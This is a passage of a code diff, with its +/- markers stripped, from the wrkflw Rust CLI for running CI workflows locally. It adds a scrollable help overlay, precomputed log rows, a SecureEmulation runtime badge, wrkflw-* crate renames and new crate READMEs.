.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Toggle log search"),
]),
Line::from(vec![
Span::styled(
"f",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Toggle log filter"),
]),
Line::from(vec![
Span::styled(
"c",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Clear search & filter"),
]),
Line::from(vec![
Span::styled(
"n",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Next search match"),
]),
Line::from(vec![
Span::styled(
"↑/↓",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Scroll logs/Navigate"),
]),
Line::from(""),
Line::from(Span::styled(
" TAB OVERVIEW",
Style::default()
.fg(Color::White)
.add_modifier(Modifier::BOLD),
)),
Line::from(""),
Line::from(vec![
Span::styled(
"1. Workflows",
Style::default()
.fg(Color::Cyan)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Browse & select workflows"),
]),
Line::from(vec![Span::raw(" • View workflow files")]),
Line::from(vec![Span::raw(" • Select multiple for batch execution")]),
Line::from(vec![Span::raw(" • Trigger remote workflows")]),
Line::from(""),
Line::from(vec![
Span::styled(
"2. Execution",
Style::default()
.fg(Color::Green)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Monitor job progress"),
]),
Line::from(vec![Span::raw(" • View job status and details")]),
Line::from(vec![Span::raw(" • Enter job details with Enter")]),
Line::from(vec![Span::raw(" • Navigate step execution")]),
Line::from(""),
Line::from(vec![
Span::styled(
"3. Logs",
Style::default()
.fg(Color::Blue)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - View execution logs"),
]),
Line::from(vec![Span::raw(" • Search and filter logs")]),
Line::from(vec![Span::raw(" • Real-time log streaming")]),
Line::from(vec![Span::raw(" • Navigate search results")]),
Line::from(""),
Line::from(vec![
Span::styled(
"4. Help",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - This comprehensive guide"),
]),
Line::from(""),
Line::from(Span::styled(
"🎯 QUICK ACTIONS",
Style::default().fg(Color::Red).add_modifier(Modifier::BOLD),
)),
Line::from(""),
Line::from(vec![
Span::styled(
"?",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Toggle help overlay"),
]),
Line::from(vec![
Span::styled(
"q",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Quit application"),
]),
Line::from(""),
Line::from(Span::styled(
"💡 TIPS",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
)),
Line::from(""),
Line::from(vec![
Span::raw("• Use "),
Span::styled("emulation mode", Style::default().fg(Color::Red)),
Span::raw(" when containers"),
]),
Line::from(vec![Span::raw(" are unavailable or for quick testing")]),
Line::from(""),
Line::from(vec![
Span::raw(""),
Span::styled("Secure emulation", Style::default().fg(Color::Yellow)),
Span::raw(" provides sandboxing"),
]),
Line::from(vec![Span::raw(" for untrusted workflows")]),
Line::from(""),
Line::from(vec![
Span::raw("• Use "),
Span::styled("validation mode", Style::default().fg(Color::Green)),
Span::raw(" to check"),
]),
Line::from(vec![Span::raw(" workflows without execution")]),
Line::from(""),
Line::from(vec![
Span::raw(""),
Span::styled("Preserve containers", Style::default().fg(Color::Blue)),
Span::raw(" on failure"),
]),
Line::from(vec![Span::raw(" for debugging (Docker/Podman only)")]),
];
// Apply scroll offset to the content
let left_help_text = if scroll_offset < left_help_text.len() {
left_help_text.into_iter().skip(scroll_offset).collect()
} else {
vec![Line::from("")]
};
let right_help_text = if scroll_offset < right_help_text.len() {
right_help_text.into_iter().skip(scroll_offset).collect()
} else {
vec![Line::from("")]
};
// Render left column
let left_widget = Paragraph::new(left_help_text)
.block(
Block::default()
.borders(Borders::ALL)
.border_type(BorderType::Rounded)
.title(Span::styled(" Help ", Style::default().fg(Color::Yellow))),
.title(Span::styled(
" WRKFLW Help - Controls & Features ",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
)),
)
.wrap(Wrap { trim: true });
f.render_widget(help_widget, area);
// Render right column
let right_widget = Paragraph::new(right_help_text)
.block(
Block::default()
.borders(Borders::ALL)
.border_type(BorderType::Rounded)
.title(Span::styled(
" Interface Guide & Tips ",
Style::default()
.fg(Color::Cyan)
.add_modifier(Modifier::BOLD),
)),
)
.wrap(Wrap { trim: true });
f.render_widget(left_widget, chunks[0]);
f.render_widget(right_widget, chunks[1]);
}
// Render a help overlay
pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>) {
pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>, scroll_offset: usize) {
let size = f.size();
// Create a slightly smaller centered modal
let width = size.width.min(60);
let height = size.height.min(20);
// Create a larger centered modal to accommodate comprehensive help content
let width = (size.width * 9 / 10).min(120); // Use 90% of width, max 120 chars
let height = (size.height * 9 / 10).min(40); // Use 90% of height, max 40 lines
let x = (size.width - width) / 2;
let y = (size.height - height) / 2;
@@ -60,10 +427,32 @@ pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>) {
height,
};
// Create a clear background
// Create a semi-transparent dark background for better visibility
let clear = Block::default().style(Style::default().bg(Color::Black));
f.render_widget(clear, size);
// Render the help content
render_help_tab(f, help_area);
// Add a border around the entire overlay for better visual separation
let overlay_block = Block::default()
.borders(Borders::ALL)
.border_type(BorderType::Double)
.style(Style::default().bg(Color::Black).fg(Color::White))
.title(Span::styled(
" Press ? or Esc to close help ",
Style::default()
.fg(Color::Gray)
.add_modifier(Modifier::ITALIC),
));
f.render_widget(overlay_block, help_area);
// Create inner area for content
let inner_area = Rect {
x: help_area.x + 1,
y: help_area.y + 1,
width: help_area.width.saturating_sub(2),
height: help_area.height.saturating_sub(2),
};
// Render the help content with scroll support
render_help_content(f, inner_area, scroll_offset);
}
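The overlay sizing above reduces to a few lines of integer math. As a standalone sketch (the `Rect` here is a stand-in for ratatui's, and `centered_modal` is a hypothetical helper, not part of the crate):

```rust
/// Minimal stand-in for ratatui's `Rect`; only the fields the math needs.
#[derive(Debug, PartialEq)]
struct Rect {
    x: u16,
    y: u16,
    width: u16,
    height: u16,
}

/// Center a modal that takes 90% of the terminal, capped at 120x40,
/// mirroring the width/height computation in `render_help_overlay`.
fn centered_modal(term_width: u16, term_height: u16) -> Rect {
    let width = (term_width * 9 / 10).min(120);
    let height = (term_height * 9 / 10).min(40);
    Rect {
        // Safe plain subtraction: width/height never exceed the terminal size.
        x: (term_width - width) / 2,
        y: (term_height - height) / 2,
        width,
        height,
    }
}

fn main() {
    // On a 200x50 terminal the 90% rule hits the 120x40 cap.
    assert_eq!(
        centered_modal(200, 50),
        Rect { x: 40, y: 5, width: 120, height: 40 }
    );
    // On an 80x24 terminal the 90% rule wins: 72x21, centered at (4, 1).
    assert_eq!(
        centered_modal(80, 24),
        Rect { x: 4, y: 1, width: 72, height: 21 }
    );
}
```

Because the computed width and height are always ≤ the terminal dimensions, the centering subtractions cannot underflow, which is why the code uses plain `-` there but `saturating_sub` when shrinking the inner content area.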


@@ -46,15 +46,15 @@ pub fn render_job_detail_view(
// Job title section
let status_text = match job.status {
executor::JobStatus::Success => "Success",
executor::JobStatus::Failure => "Failed",
executor::JobStatus::Skipped => "Skipped",
wrkflw_executor::JobStatus::Success => "Success",
wrkflw_executor::JobStatus::Failure => "Failed",
wrkflw_executor::JobStatus::Skipped => "Skipped",
};
let status_style = match job.status {
executor::JobStatus::Success => Style::default().fg(Color::Green),
executor::JobStatus::Failure => Style::default().fg(Color::Red),
executor::JobStatus::Skipped => Style::default().fg(Color::Yellow),
wrkflw_executor::JobStatus::Success => Style::default().fg(Color::Green),
wrkflw_executor::JobStatus::Failure => Style::default().fg(Color::Red),
wrkflw_executor::JobStatus::Skipped => Style::default().fg(Color::Yellow),
};
let job_title = Paragraph::new(vec![
@@ -101,15 +101,19 @@ pub fn render_job_detail_view(
let rows = job.steps.iter().map(|step| {
let status_symbol = match step.status {
executor::StepStatus::Success => "✅",
executor::StepStatus::Failure => "❌",
executor::StepStatus::Skipped => "⏭️",
wrkflw_executor::StepStatus::Success => "✅",
wrkflw_executor::StepStatus::Failure => "❌",
wrkflw_executor::StepStatus::Skipped => "⏭️",
};
let status_style = match step.status {
executor::StepStatus::Success => Style::default().fg(Color::Green),
executor::StepStatus::Failure => Style::default().fg(Color::Red),
executor::StepStatus::Skipped => Style::default().fg(Color::Gray),
wrkflw_executor::StepStatus::Success => {
Style::default().fg(Color::Green)
}
wrkflw_executor::StepStatus::Failure => Style::default().fg(Color::Red),
wrkflw_executor::StepStatus::Skipped => {
Style::default().fg(Color::Gray)
}
};
Row::new(vec![
@@ -147,15 +151,21 @@ pub fn render_job_detail_view(
// Show step output with proper styling
let status_text = match step.status {
executor::StepStatus::Success => "Success",
executor::StepStatus::Failure => "Failed",
executor::StepStatus::Skipped => "Skipped",
wrkflw_executor::StepStatus::Success => "Success",
wrkflw_executor::StepStatus::Failure => "Failed",
wrkflw_executor::StepStatus::Skipped => "Skipped",
};
let status_style = match step.status {
executor::StepStatus::Success => Style::default().fg(Color::Green),
executor::StepStatus::Failure => Style::default().fg(Color::Red),
executor::StepStatus::Skipped => Style::default().fg(Color::Yellow),
wrkflw_executor::StepStatus::Success => {
Style::default().fg(Color::Green)
}
wrkflw_executor::StepStatus::Failure => {
Style::default().fg(Color::Red)
}
wrkflw_executor::StepStatus::Skipped => {
Style::default().fg(Color::Yellow)
}
};
let mut output_text = step.output.clone();


@@ -140,45 +140,8 @@ pub fn render_logs_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, a
f.render_widget(search_block, chunks[1]);
}
// Combine application logs with system logs
let mut all_logs = Vec::new();
// Now all logs should have timestamps in the format [HH:MM:SS]
// Process app logs
for log in &app.logs {
all_logs.push(log.clone());
}
// Process system logs
for log in logging::get_logs() {
all_logs.push(log.clone());
}
// Filter logs based on search query and filter level
let filtered_logs = if !app.log_search_query.is_empty() || app.log_filter_level.is_some() {
all_logs
.iter()
.filter(|log| {
let passes_filter = match &app.log_filter_level {
None => true,
Some(level) => level.matches(log),
};
let matches_search = if app.log_search_query.is_empty() {
true
} else {
log.to_lowercase()
.contains(&app.log_search_query.to_lowercase())
};
passes_filter && matches_search
})
.cloned()
.collect::<Vec<String>>()
} else {
all_logs.clone() // Clone to avoid moving all_logs
};
// Use processed logs from background thread instead of processing on every frame
let filtered_logs = &app.processed_logs;
// Create a table for logs for better organization
let header_cells = ["Time", "Type", "Message"]
@@ -189,109 +152,10 @@ pub fn render_logs_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, a
.style(Style::default().add_modifier(Modifier::BOLD))
.height(1);
let rows = filtered_logs.iter().map(|log_line| {
// Parse log line to extract timestamp, type and message
// Extract timestamp from log format [HH:MM:SS]
let timestamp = if log_line.starts_with('[') && log_line.contains(']') {
let end = log_line.find(']').unwrap_or(0);
if end > 1 {
log_line[1..end].to_string()
} else {
"??:??:??".to_string() // Show placeholder for malformed logs
}
} else {
"??:??:??".to_string() // Show placeholder for malformed logs
};
let (log_type, log_style, _) =
if log_line.contains("Error") || log_line.contains("error") || log_line.contains("❌")
{
("ERROR", Style::default().fg(Color::Red), log_line.as_str())
} else if log_line.contains("Warning")
|| log_line.contains("warning")
|| log_line.contains("⚠️")
{
(
"WARN",
Style::default().fg(Color::Yellow),
log_line.as_str(),
)
} else if log_line.contains("Success")
|| log_line.contains("success")
|| log_line.contains("✅")
{
(
"SUCCESS",
Style::default().fg(Color::Green),
log_line.as_str(),
)
} else if log_line.contains("Running")
|| log_line.contains("running")
|| log_line.contains("🔄")
{
("INFO", Style::default().fg(Color::Cyan), log_line.as_str())
} else if log_line.contains("Triggering") || log_line.contains("triggered") {
(
"TRIG",
Style::default().fg(Color::Magenta),
log_line.as_str(),
)
} else {
("INFO", Style::default().fg(Color::Gray), log_line.as_str())
};
// Extract content after timestamp
let content = if log_line.starts_with('[') && log_line.contains(']') {
let start = log_line.find(']').unwrap_or(0) + 1;
log_line[start..].trim()
} else {
log_line.as_str()
};
// Highlight search matches in content if search is active
let mut content_spans = Vec::new();
if !app.log_search_query.is_empty() {
let lowercase_content = content.to_lowercase();
let lowercase_query = app.log_search_query.to_lowercase();
if lowercase_content.contains(&lowercase_query) {
let mut last_idx = 0;
while let Some(idx) = lowercase_content[last_idx..].find(&lowercase_query) {
let real_idx = last_idx + idx;
// Add text before match
if real_idx > last_idx {
content_spans.push(Span::raw(content[last_idx..real_idx].to_string()));
}
// Add matched text with highlight
let match_end = real_idx + app.log_search_query.len();
content_spans.push(Span::styled(
content[real_idx..match_end].to_string(),
Style::default().bg(Color::Yellow).fg(Color::Black),
));
last_idx = match_end;
}
// Add remaining text after last match
if last_idx < content.len() {
content_spans.push(Span::raw(content[last_idx..].to_string()));
}
} else {
content_spans.push(Span::raw(content));
}
} else {
content_spans.push(Span::raw(content));
}
Row::new(vec![
Cell::from(timestamp),
Cell::from(log_type).style(log_style),
Cell::from(Line::from(content_spans)),
])
});
// Convert processed logs to table rows - this is now very fast since logs are pre-processed
let rows = filtered_logs
.iter()
.map(|processed_log| processed_log.to_row());
let content_idx = if show_search_bar { 2 } else { 1 };
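For contrast with the pre-processing refactor, the per-frame work the old code did can be reduced to two pure functions. A self-contained sketch under simplifying assumptions (case-insensitive matching, condensed priority order; `split_timestamp` and `classify` are illustrative names, not the crate's API):

```rust
/// Pull an `[HH:MM:SS]` prefix off a log line, falling back to a placeholder
/// for malformed lines, as the logs table does.
fn split_timestamp(line: &str) -> (String, &str) {
    if line.starts_with('[') {
        if let Some(end) = line.find(']') {
            if end > 1 {
                return (line[1..end].to_string(), line[end + 1..].trim());
            }
        }
    }
    ("??:??:??".to_string(), line)
}

/// Map a line to the level tag shown in the table's "Type" column.
fn classify(line: &str) -> &'static str {
    let lower = line.to_lowercase();
    if lower.contains("error") {
        "ERROR"
    } else if lower.contains("warning") {
        "WARN"
    } else if lower.contains("success") {
        "SUCCESS"
    } else if lower.contains("trigger") {
        "TRIG"
    } else {
        "INFO"
    }
}

fn main() {
    assert_eq!(
        split_timestamp("[12:00:01] Build success"),
        ("12:00:01".to_string(), "Build success")
    );
    assert_eq!(
        split_timestamp("no timestamp"),
        ("??:??:??".to_string(), "no timestamp")
    );
    assert_eq!(classify("Build success"), "SUCCESS");
    assert_eq!(classify("Triggering workflow"), "TRIG");
}
```

Doing this string scanning for every line on every frame is what made the render path expensive; moving it off-thread and caching the resulting rows is the whole point of the change.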


@@ -15,7 +15,7 @@ use std::io;
pub fn render_ui(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &mut App) {
// Check if help should be shown as an overlay
if app.show_help {
help_overlay::render_help_overlay(f);
help_overlay::render_help_overlay(f, app.help_scroll);
return;
}
@@ -48,7 +48,7 @@ pub fn render_ui(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &mut App) {
}
}
2 => logs_tab::render_logs_tab(f, app, main_chunks[1]),
3 => help_overlay::render_help_tab(f, main_chunks[1]),
3 => help_overlay::render_help_content(f, main_chunks[1], app.help_scroll),
_ => {}
}
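The `help_scroll` state that `render_ui` now threads through is ordinary clamped-offset bookkeeping. A sketch of the clamping under assumed names (the actual key handling lives in the app's event loop, not shown here):

```rust
/// Clamp a scroll offset so the viewport never runs past the content.
/// `delta` is negative for ↑/k and positive for ↓/j.
fn apply_scroll(offset: usize, delta: i32, content_lines: usize, viewport: usize) -> usize {
    let max = content_lines.saturating_sub(viewport);
    let moved = if delta < 0 {
        offset.saturating_sub(delta.unsigned_abs() as usize)
    } else {
        offset.saturating_add(delta as usize)
    };
    moved.min(max)
}

fn main() {
    // 100 lines of help in a 20-line viewport: offsets clamp to 0..=80.
    assert_eq!(apply_scroll(0, -1, 100, 20), 0);
    assert_eq!(apply_scroll(0, 1, 100, 20), 1);
    assert_eq!(apply_scroll(79, 5, 100, 20), 80);
    // Content shorter than the viewport never scrolls.
    assert_eq!(apply_scroll(3, 1, 10, 20), 0);
}
```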


@@ -1,6 +1,5 @@
// Status bar rendering
use crate::app::App;
use executor::RuntimeType;
use ratatui::{
backend::CrosstermBackend,
layout::{Alignment, Rect},
@@ -10,6 +9,7 @@ use ratatui::{
Frame,
};
use std::io;
use wrkflw_executor::RuntimeType;
// Render the status bar
pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, area: Rect) {
@@ -41,7 +41,8 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
.bg(match app.runtime_type {
RuntimeType::Docker => Color::Blue,
RuntimeType::Podman => Color::Cyan,
RuntimeType::Emulation => Color::Magenta,
RuntimeType::SecureEmulation => Color::Green,
RuntimeType::Emulation => Color::Red,
})
.fg(Color::White),
));
@@ -50,16 +51,17 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
match app.runtime_type {
RuntimeType::Docker => {
// Check Docker silently using safe FD redirection
let is_docker_available =
match utils::fd::with_stderr_to_null(executor::docker::is_available) {
Ok(result) => result,
Err(_) => {
logging::debug(
"Failed to redirect stderr when checking Docker availability.",
);
false
}
};
let is_docker_available = match wrkflw_utils::fd::with_stderr_to_null(
wrkflw_executor::docker::is_available,
) {
Ok(result) => result,
Err(_) => {
wrkflw_logging::debug(
"Failed to redirect stderr when checking Docker availability.",
);
false
}
};
status_items.push(Span::raw(" "));
status_items.push(Span::styled(
@@ -79,16 +81,17 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
}
RuntimeType::Podman => {
// Check Podman silently using safe FD redirection
let is_podman_available =
match utils::fd::with_stderr_to_null(executor::podman::is_available) {
Ok(result) => result,
Err(_) => {
logging::debug(
"Failed to redirect stderr when checking Podman availability.",
);
false
}
};
let is_podman_available = match wrkflw_utils::fd::with_stderr_to_null(
wrkflw_executor::podman::is_available,
) {
Ok(result) => result,
Err(_) => {
wrkflw_logging::debug(
"Failed to redirect stderr when checking Podman availability.",
);
false
}
};
status_items.push(Span::raw(" "));
status_items.push(Span::styled(
@@ -106,6 +109,12 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
.fg(Color::White),
));
}
RuntimeType::SecureEmulation => {
status_items.push(Span::styled(
" 🔒SECURE ",
Style::default().bg(Color::Green).fg(Color::White),
));
}
RuntimeType::Emulation => {
// No need to check anything for emulation mode
}
@@ -159,7 +168,7 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
}
2 => {
// For logs tab, show scrolling instructions
let log_count = app.logs.len() + logging::get_logs().len();
let log_count = app.logs.len() + wrkflw_logging::get_logs().len();
if log_count > 0 {
// Convert to a static string for consistent return type
let scroll_text = format!(
@@ -172,7 +181,7 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
"[No logs to display]"
}
}
3 => "[?] Toggle help overlay",
3 => "[↑/↓] Scroll help [?] Toggle help overlay",
_ => "",
};
status_items.push(Span::styled(


@@ -1,13 +1,18 @@
[package]
name = "utils"
name = "wrkflw-utils"
version.workspace = true
edition.workspace = true
description = "utility functions for wrkflw"
description = "Utility functions for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
wrkflw-models = { path = "../models", version = "0.7.0" }
# External dependencies
serde.workspace = true

crates/utils/README.md

@@ -0,0 +1,21 @@
## wrkflw-utils
Shared helpers used across crates.
- Workflow file detection (`.github/workflows/*.yml`, `.gitlab-ci.yml`)
- File-descriptor redirection utilities for silencing noisy subprocess output
### Example
```rust
use std::path::Path;
use wrkflw_utils::{is_workflow_file, fd::with_stderr_to_null};
assert!(is_workflow_file(Path::new(".github/workflows/ci.yml")));
let value = with_stderr_to_null(|| {
eprintln!("this is hidden");
42
}).unwrap();
assert_eq!(value, 42);
```


@@ -1,14 +1,19 @@
[package]
name = "validators"
name = "wrkflw-validators"
version.workspace = true
edition.workspace = true
description = "validation functionality for wrkflw"
description = "Workflow validation functionality for wrkflw execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
matrix = { path = "../matrix" }
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
# External dependencies
serde.workspace = true


@@ -0,0 +1,29 @@
## wrkflw-validators
Validation utilities for workflows and steps.
- Validates GitHub Actions sections: jobs, steps, action references, triggers
- GitLab pipeline validation helpers
- Matrix-specific validation
### Example
```rust
use serde_yaml::Value;
use wrkflw_models::ValidationResult;
use wrkflw_validators::{validate_jobs, validate_triggers};
let yaml: Value = serde_yaml::from_str(r#"name: demo
on: [workflow_dispatch]
jobs: { build: { runs-on: ubuntu-latest, steps: [] } }
"#).unwrap();
let mut res = ValidationResult::new();
if let Some(on) = yaml.get("on") {
validate_triggers(on, &mut res);
}
if let Some(jobs) = yaml.get("jobs") {
validate_jobs(jobs, &mut res);
}
assert!(res.is_valid);
```


@@ -1,4 +1,4 @@
use models::ValidationResult;
use wrkflw_models::ValidationResult;
pub fn validate_action_reference(
action_ref: &str,


@@ -1,6 +1,6 @@
use models::gitlab::{Job, Pipeline};
use models::ValidationResult;
use std::collections::HashMap;
use wrkflw_models::gitlab::{Job, Pipeline};
use wrkflw_models::ValidationResult;
/// Validate a GitLab CI/CD pipeline
pub fn validate_gitlab_pipeline(pipeline: &Pipeline) -> ValidationResult {
@@ -65,7 +65,7 @@ fn validate_jobs(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
// Check retry configuration
if let Some(retry) = &job.retry {
match retry {
models::gitlab::Retry::MaxAttempts(attempts) => {
wrkflw_models::gitlab::Retry::MaxAttempts(attempts) => {
if *attempts > 10 {
result.add_issue(format!(
"Job '{}' has excessive retry count: {}. Consider reducing to avoid resource waste",
@@ -73,7 +73,7 @@ fn validate_jobs(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
));
}
}
models::gitlab::Retry::Detailed { max, when: _ } => {
wrkflw_models::gitlab::Retry::Detailed { max, when: _ } => {
if *max > 10 {
result.add_issue(format!(
"Job '{}' has excessive retry count: {}. Consider reducing to avoid resource waste",


@@ -1,6 +1,6 @@
use crate::{validate_matrix, validate_steps};
use models::ValidationResult;
use serde_yaml::Value;
use wrkflw_models::ValidationResult;
pub fn validate_jobs(jobs: &Value, result: &mut ValidationResult) {
if let Value::Mapping(jobs_map) = jobs {


@@ -1,5 +1,5 @@
use models::ValidationResult;
use serde_yaml::Value;
use wrkflw_models::ValidationResult;
pub fn validate_matrix(matrix: &Value, result: &mut ValidationResult) {
// Check if matrix is a mapping


@@ -1,7 +1,7 @@
use crate::validate_action_reference;
use models::ValidationResult;
use serde_yaml::Value;
use std::collections::HashSet;
use wrkflw_models::ValidationResult;
pub fn validate_steps(steps: &[Value], job_name: &str, result: &mut ValidationResult) {
let mut step_ids: HashSet<String> = HashSet::new();


@@ -1,5 +1,5 @@
use models::ValidationResult;
use serde_yaml::Value;
use wrkflw_models::ValidationResult;
pub fn validate_triggers(on: &Value, result: &mut ValidationResult) {
let valid_events = vec![


@@ -12,18 +12,18 @@ license.workspace = true
[dependencies]
# Workspace crates
models = { path = "../models" }
executor = { path = "../executor" }
github = { path = "../github" }
gitlab = { path = "../gitlab" }
logging = { path = "../logging" }
matrix = { path = "../matrix" }
parser = { path = "../parser" }
runtime = { path = "../runtime" }
ui = { path = "../ui" }
utils = { path = "../utils" }
validators = { path = "../validators" }
evaluator = { path = "../evaluator" }
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-executor = { path = "../executor", version = "0.7.0" }
wrkflw-github = { path = "../github", version = "0.7.0" }
wrkflw-gitlab = { path = "../gitlab", version = "0.7.0" }
wrkflw-logging = { path = "../logging", version = "0.7.0" }
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
wrkflw-parser = { path = "../parser", version = "0.7.0" }
wrkflw-runtime = { path = "../runtime", version = "0.7.0" }
wrkflw-ui = { path = "../ui", version = "0.7.0" }
wrkflw-utils = { path = "../utils", version = "0.7.0" }
wrkflw-validators = { path = "../validators", version = "0.7.0" }
wrkflw-evaluator = { path = "../evaluator", version = "0.7.0" }
# External dependencies
clap.workspace = true
@@ -62,4 +62,4 @@ path = "src/lib.rs"
[[bin]]
name = "wrkflw"
path = "src/main.rs"
path = "src/main.rs"

crates/wrkflw/README.md

@@ -0,0 +1,112 @@
## WRKFLW (CLI and Library)
This crate provides the `wrkflw` command-line interface and a thin library surface that ties together all WRKFLW subcrates. It lets you validate and execute GitHub Actions workflows and GitLab CI pipelines locally, with a built-in TUI for an interactive experience.
- **Validate**: Lints structure and common mistakes in workflow/pipeline files
- **Run**: Executes jobs locally using Docker, Podman, or emulation (no containers)
- **TUI**: Interactive terminal UI for browsing workflows, running, and viewing logs
- **Trigger**: Manually trigger remote runs on GitHub/GitLab
### Installation
```bash
cargo install wrkflw
```
### Quick start
```bash
# Launch the TUI (auto-loads .github/workflows)
wrkflw
# Validate all workflows in the default directory
wrkflw validate
# Validate a specific file or directory
wrkflw validate .github/workflows/ci.yml
wrkflw validate path/to/workflows
# Validate multiple files and/or directories
wrkflw validate path/to/flow-1.yml path/to/flow-2.yml path/to/workflows
# Run a workflow (Docker by default)
wrkflw run .github/workflows/ci.yml
# Use Podman or emulation instead of Docker
wrkflw run --runtime podman .github/workflows/ci.yml
wrkflw run --runtime emulation .github/workflows/ci.yml
# Open the TUI explicitly
wrkflw tui
wrkflw tui --runtime podman
```
### Commands
- **validate**: Validate workflow/pipeline files and/or directories
- GitHub (default): `.github/workflows/*.yml`
- GitLab: `.gitlab-ci.yml` or files ending with `gitlab-ci.yml`
- Accepts multiple paths in a single invocation
- Exit code behavior (by default): `1` when any validation failure is detected
- Flags: `--gitlab`, `--exit-code`, `--no-exit-code`, `--verbose`
- **run**: Execute a workflow or pipeline locally
- Runtimes: `docker` (default), `podman`, `emulation`
- Flags: `--runtime`, `--preserve-containers-on-failure`, `--gitlab`, `--verbose`
- **tui**: Interactive terminal interface
- Browse workflows, execute, and inspect logs and job details
- **trigger**: Trigger a GitHub workflow (requires `GITHUB_TOKEN`)
- **trigger-gitlab**: Trigger a GitLab pipeline (requires `GITLAB_TOKEN`)
- **list**: Show detected workflows and pipelines in the repo
### Environment variables
- **GITHUB_TOKEN**: Required for `trigger` when calling GitHub
- **GITLAB_TOKEN**: Required for `trigger-gitlab` (api scope)
### Exit codes
- `validate`: `0` if all pass; `1` if any fail (unless `--no-exit-code`)
- `run`: `0` on success, `1` if execution fails
### Library usage
This crate re-exports subcrates for convenience if you want to embed functionality:
```rust
use std::path::Path;
use wrkflw::executor::{execute_workflow, ExecutionConfig, RuntimeType};
# tokio_test::block_on(async {
let cfg = ExecutionConfig {
runtime_type: RuntimeType::Docker,
verbose: true,
preserve_containers_on_failure: false,
};
let result = execute_workflow(Path::new(".github/workflows/ci.yml"), cfg).await?;
println!("status: {:?}", result.summary_status);
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```
You can also run the TUI programmatically:
```rust
use std::path::PathBuf;
use wrkflw::executor::RuntimeType;
use wrkflw::ui::run_wrkflw_tui;
# tokio_test::block_on(async {
let path = PathBuf::from(".github/workflows");
run_wrkflw_tui(Some(&path), RuntimeType::Docker, true, false).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```
### Notes
- See the repository root README for feature details, limitations, and a full walkthrough.
- Service containers and advanced Actions features are best supported in Docker/Podman modes.
- Emulation mode skips containerized steps and runs commands on the host.


@@ -1,12 +1,12 @@
pub use evaluator;
pub use executor;
pub use github;
pub use gitlab;
pub use logging;
pub use matrix;
pub use models;
pub use parser;
pub use runtime;
pub use ui;
pub use utils;
pub use validators;
pub use wrkflw_evaluator as evaluator;
pub use wrkflw_executor as executor;
pub use wrkflw_github as github;
pub use wrkflw_gitlab as gitlab;
pub use wrkflw_logging as logging;
pub use wrkflw_matrix as matrix;
pub use wrkflw_models as models;
pub use wrkflw_parser as parser;
pub use wrkflw_runtime as runtime;
pub use wrkflw_ui as ui;
pub use wrkflw_utils as utils;
pub use wrkflw_validators as validators;


@@ -10,16 +10,19 @@ enum RuntimeChoice {
Docker,
/// Use Podman containers for isolation
Podman,
/// Use process emulation mode (no containers)
/// Use process emulation mode (no containers, UNSAFE)
Emulation,
/// Use secure emulation mode with sandboxing (recommended for untrusted code)
SecureEmulation,
}
impl From<RuntimeChoice> for executor::RuntimeType {
impl From<RuntimeChoice> for wrkflw_executor::RuntimeType {
fn from(choice: RuntimeChoice) -> Self {
match choice {
RuntimeChoice::Docker => executor::RuntimeType::Docker,
RuntimeChoice::Podman => executor::RuntimeType::Podman,
RuntimeChoice::Emulation => executor::RuntimeType::Emulation,
RuntimeChoice::Docker => wrkflw_executor::RuntimeType::Docker,
RuntimeChoice::Podman => wrkflw_executor::RuntimeType::Podman,
RuntimeChoice::Emulation => wrkflw_executor::RuntimeType::Emulation,
RuntimeChoice::SecureEmulation => wrkflw_executor::RuntimeType::SecureEmulation,
}
}
}
@@ -48,8 +51,9 @@ struct Wrkflw {
enum Commands {
/// Validate workflow or pipeline files
Validate {
/// Path to workflow/pipeline file or directory (defaults to .github/workflows)
path: Option<PathBuf>,
/// Path(s) to workflow/pipeline file(s) or directory(ies) (defaults to .github/workflows if none provided)
#[arg(value_name = "path", num_args = 0..)]
paths: Vec<PathBuf>,
